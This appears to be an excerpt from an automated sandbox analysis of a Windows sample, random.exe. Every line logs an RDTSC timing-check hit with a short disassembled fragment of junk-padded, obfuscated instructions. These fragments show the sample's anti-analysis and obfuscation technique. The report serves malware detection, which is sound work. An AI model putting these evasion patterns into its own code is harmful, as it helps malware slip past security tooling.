            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2D3AA second address: E2D3B8 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8874D4CC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2D509 second address: E2D544 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F887475EDA0h 0x00000013 jmp 00007F887475ED9Ah 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2D6B2 second address: E2D6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8874D4CC90h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2D6C8 second address: E2D6CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2D6CD second address: E2D6D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2D6D3 second address: E2D6D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2D98C second address: E2D992 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2DC0F second address: E2DC30 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F887475ED9Ah 0x00000009 jmp 00007F887475EDA3h 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2DD98 second address: E2DD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2F82F second address: E2F877 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push esi 0x0000000c pop esi 0x0000000d pop esi 0x0000000e jmp 00007F887475ED9Fh 0x00000013 push edx 0x00000014 je 00007F887475ED96h 0x0000001a pop edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F887475EDA2h 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E2F877 second address: E2F87D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E349CE second address: E349D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E35994 second address: E35998 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E38DD2 second address: E38DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F887475ED96h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E38DDC second address: E38DE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E38DE2 second address: E38DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E38DE8 second address: E38E0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC8Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F8874D4CC8Fh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3DBCC second address: E3DBD2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3DBD2 second address: E3DBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F8874D4CC86h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3DD57 second address: E3DD67 instructions: 0x00000000 rdtsc 0x00000002 js 00007F887475ED96h 0x00000008 jns 00007F887475ED96h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3DE90 second address: E3DE9A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8874D4CC86h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3DFEA second address: E3DFF1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3DFF1 second address: E3DFF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3DFF7 second address: E3E01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F887475ED9Eh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d js 00007F887475ED9Ah 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jg 00007F887475ED96h 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3E144 second address: E3E149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3E2EF second address: E3E2F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3E2F3 second address: E3E309 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8874D4CC90h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3E309 second address: E3E319 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 js 00007F887475ED96h 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3E319 second address: E3E31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3E31D second address: E3E321 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E3E321 second address: E3E34B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8874D4CC97h 0x00000010 jc 00007F8874D4CC99h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E41EE9 second address: E41F10 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jne 00007F887475ED96h 0x0000000b jmp 00007F887475EDA1h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jnp 00007F887475ED96h 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E42044 second address: E4208A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jp 00007F8874D4CC8Ch 0x0000000d jnp 00007F8874D4CC86h 0x00000013 jno 00007F8874D4CC8Eh 0x00000019 popad 0x0000001a push ebx 0x0000001b jnc 00007F8874D4CC9Fh 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E44D2A second address: E44D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E44D30 second address: E44D48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jmp 00007F8874D4CC8Dh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E44D48 second address: E44D4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E44D4C second address: E44D52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E44ECA second address: E44ECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E44ECE second address: E44ED4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E44ED4 second address: E44EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E44EDA second address: E44EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8874D4CC93h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E450A3 second address: E450B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jnc 00007F887475ED9Ah 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E450B5 second address: E450BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4B1C9 second address: E4B1F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push esi 0x0000000a pop esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007F887475EDA8h 0x00000012 popad 0x00000013 jc 00007F887475ED9Eh 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DAA90E second address: DAA914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DAA914 second address: DAA91A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DAA91A second address: DAA91F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DAA91F second address: DAA927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DAA927 second address: DAA92B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DAA92B second address: DAA95B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jl 00007F887475EDA6h 0x00000012 jmp 00007F887475EDA0h 0x00000017 push eax 0x00000018 push edx 0x00000019 push ecx 0x0000001a pop ecx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4A47C second address: E4A484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4A484 second address: E4A4A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007F887475ED96h 0x00000009 jmp 00007F887475EDA1h 0x0000000e jnc 00007F887475ED96h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4A4A6 second address: E4A4CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F8874D4CCA4h 0x0000000b jmp 00007F8874D4CC98h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4A5F2 second address: E4A5FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F887475ED96h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4A5FC second address: E4A602 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4ABC7 second address: E4ABD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F887475ED9Dh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4ABD8 second address: E4ABF2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8874D4CC94h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4ABF2 second address: E4AC07 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F887475ED9Ch 0x00000008 pop esi 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4AC07 second address: E4AC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4AC0D second address: E4AC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F887475EDA8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 pop edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4AC33 second address: E4AC4A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007F8874D4CC86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnc 00007F8874D4CC86h 0x00000013 push eax 0x00000014 pop eax 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E4E359 second address: E4E35E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5294D second address: E52951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E52951 second address: E52961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jng 00007F887475ED96h 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E52961 second address: E5296C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F8874D4CC86h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5296C second address: E52979 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E52979 second address: E5297D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFAD70 second address: DFADF3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jmp 00007F887475ED9Ah 0x0000000f pop esi 0x00000010 popad 0x00000011 mov dword ptr [esp], eax 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F887475ED98h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov ebx, dword ptr [ebp+12497E63h] 0x00000034 mov dword ptr [ebp+122D34F1h], esi 0x0000003a add eax, ebx 0x0000003c jmp 00007F887475EDA9h 0x00000041 push eax 0x00000042 push eax 0x00000043 push edx 0x00000044 push ebx 0x00000045 jmp 00007F887475EDA5h 0x0000004a pop ebx 0x0000004b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFADF3 second address: DFADF8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFADF8 second address: DFAE2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov dword ptr [ebp+124664ECh], ebx 0x00000010 push 00000004h 0x00000012 mov cx, 9BC1h 0x00000016 jmp 00007F887475EDA4h 0x0000001b nop 0x0000001c push eax 0x0000001d push edx 0x0000001e push edx 0x0000001f ja 00007F887475ED96h 0x00000025 pop edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFAE2D second address: DFAE37 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F8874D4CC8Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFAE37 second address: DFAE44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFAE44 second address: DFAE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: DFAE48 second address: DFAE5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475ED9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E531D9 second address: E531E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E531E3 second address: E53202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007F887475EDA7h 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E59BCA second address: E59BDF instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F8874D4CC8Bh 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E59BDF second address: E59C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F887475EDA2h 0x00000007 jmp 00007F887475EDA4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jbe 00007F887475ED9Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5A427 second address: E5A44F instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F8874D4CC86h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F8874D4CC98h 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5A44F second address: E5A469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F887475EDA6h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5A469 second address: E5A495 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8874D4CC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8874D4CC97h 0x00000012 jp 00007F8874D4CC88h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5AA78 second address: E5AA9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F887475EDA4h 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F887475ED96h 0x00000012 jne 00007F887475ED96h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5AD16 second address: E5AD1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5AD1A second address: E5AD47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F887475ED9Ah 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jg 00007F887475ED96h 0x0000001c jnc 00007F887475ED96h 0x00000022 pushad 0x00000023 popad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 js 00007F887475ED96h 0x0000002d rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5AD47 second address: E5AD51 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8874D4CC86h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5AD51 second address: E5AD56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5AD56 second address: E5AD5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5AFF5 second address: E5B018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F887475EDA0h 0x00000009 pop edx 0x0000000a js 00007F887475ED9Eh 0x00000010 push edi 0x00000011 pop edi 0x00000012 jnp 00007F887475ED96h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5B018 second address: E5B023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5B63E second address: E5B646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5B646 second address: E5B64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5B64A second address: E5B65A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5B65A second address: E5B65E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E5B65E second address: E5B676 instructions: 0x00000000 rdtsc 0x00000002 je 00007F887475ED96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jmp 00007F887475ED9Ah 0x00000012 pop esi 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: E615A2 second address: E615B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F8874D4CC8Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
